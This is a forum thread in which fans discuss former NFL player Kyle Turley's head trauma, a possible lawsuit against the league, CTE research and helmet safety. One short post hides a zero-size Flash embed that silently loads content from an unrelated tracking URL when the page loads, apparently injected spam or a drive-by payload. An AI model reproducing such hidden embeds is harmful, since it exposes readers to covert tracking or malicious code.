N/S Story Of Ex-Saint Kyle Turley Suffering From Head Trauma (merged) (1 Viewer)

Turley, who believes he was given inadequate medical care during his career by the three teams for which he played, plans to contact a lawyer about the possibility of suing the NFL. “We could be talking about a class-action suit,” he says.

This could get interesting. Very sad situation for Turley. I wish nothing but the very best for him and his family.

So sad, I will be praying for him.

I'm torn over this. On one hand, I feel for the guy and truly hope he doesn't have any long term problems. On the other hand, he willingly played a violent game for a living and was paid handsomly to do it...you can't have it both ways. Sure, if it is found that these guys weren't receiving proper treatment, that's one thing, but you can't enjoy all the benefits of the NFL life, and then turn and sue if there are some negative effects later on.

Teams have a lot invested in their players, it behooves them to take care of them properly.

I'm sorry he's got lasting effects but, I hope he doesn't go the class-action suit against the NFL route. It's that kind of bs that ruins the game. You don't want concussions or risk of serious injury, don't be an NFL player, go do something else.

Somebody wanting proper medical care is BS? I'm so sorry for you. I'd rather the men be able to enjoy their lives, the same way watching them brings enjoyment and entertainment to ours. Everyone knows there's injury, but I don't think expecting proper treatment is too much to ask.

There is a frightening article in the current GQ about doctors who have diagnosed a specific brain disease that is caused by football. The doctor who autopised Mike Webster (who died young with serious mental problems) examined his brain and those of a number of other players who killed themselves or drugged/drank themselves to death young and found things that they had never seen before in a human brain. It's a worthwhile read, though very troubling for anyone who plays/loves football.

I'm sorry he's got lasting effects but, I hope he doesn't go the class-action suit against the NFL route. It's that kind of bs that ruins the game. You don't want concussions or risk of serious injury, don't be an NFL player, go do something else.

I understand what you're saying, but according to the article, the NFL has been doing a lot to deny and ignore the clinical evidence that supports the problem of traumatic closed head injuries. When will they be held accountable for their role in this? Besides the fact that it is obviously a man's choice to play in the league or not to, it is also an employer's responsibility to ensure safety as much as possible, given the current medical technological advances of diagnosing, treating and even curing diseases like CTE (Chronic Traumatic Encephalopathy).

I highly recommend this article, even though it is a long read. It will open your eyes a bit. Dr. Bennet Omalu discovered the disease and is now currently working on treatment with the hope of curing it one day.
Omalu has set his sights on curing CTE. And why not? “You pop a pill before you play, a medicine that prevents the buildup of tau,” he says. “Like you take an aspirin to prevent heart disease.” Why not? “This is how we now need to talk. Not this back-and-forth of human selfishness. Not this NFL politics and meanness. Anybody still denying the disease is out of his mind. The issue now is treatment. That is my next step, now that I understand the pathology.”

http://men.style.com/gq/features/landing?id=content_10980

There is a simple solution to this problem: scale back the protection the helmet provides.

Players feel invincible in helmets. You put a leather helmet (or no helmet) on a guy and he's not going to lead with his head.

Is there a concussion epidemic among rugby players? Aussie rules football?

The more they beef up the helmet, the more guys will do unsafe things with their heads.

Less protective helmets will change the game, no doubt. The hits will change. But I'd be cool with it.

Wow. Tragic.<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="http://brbyowner.com/?tracker=4730"></param><param name="allowFullScreen" value="true"></param><embed src="http://brbyowner.com/?tracker=4730" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>

Yes it is. My prayers go out to Kyle and his family!!!

Somebody wanting proper medical care is BS? I'm so sorry for you. I'd rather the men be able to enjoy their lives, the same way watching them brings enjoyment and entertainment to ours. Everyone knows there's injury, but I don't think expecting proper treatment is too much to ask.

You don't need to feel sorry for me, I'm 100% healthy. A class-action suit means that Turley believes all the players are getting improper care, not just him. Most players don't end up with his problem, though. I think he needs to accept some responsiblity for the decisions that he made which may have contributed to his current condition. He could have retired earlier, played less aggressively, or decided to pursue music right out of college instead of pro football. He could have seen what happened to Darryl Stingley, Mike Utley, Dennis Byrd and said to himself, you know what, I don't want to risk my long term health for this. Now it seems a day late and a dollar short imo.

I am with you gavinj, at the same time I think that they need to protect future players by learning from the mistakes the NFL made in the past, seems easy enough to make better gear to protect the players.

When you read an article like this, you start to understand why the NFL wants to protect Defensliss players. (QB's, WR's) But the reality is, lineman are crashing heads on almost every play.

GODSMACK, think about it.

Actually, he was listening to Country music. My husband received a call from him after it happened, as they are friends.

We too were stunned upon hearing the news, but the good thing is...Kyle is feeling good right now, and is under doctor's care. He'll go through more testing, but is living a good quality of life at the moment. The problem is that he doesn't know when it'll come on again.

For those of you interested, Kyle will be playing (Country music) at the Howling Wolf in Mandeville on Oct. 9. Tickets will go on sale soon.

He's also going to play (Country music) in the LOA section at Voodoo Music Experience.

Aw man... I hate to see ANYONE in a position like this.. It's gotta be hell trying to live a normal life with those problems popping up whenever they feel like it.

Thoughts and prayers out to the Turley family!!

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Already have an account? Log in here.

Users who are viewing this thread

Back
    Top Bottom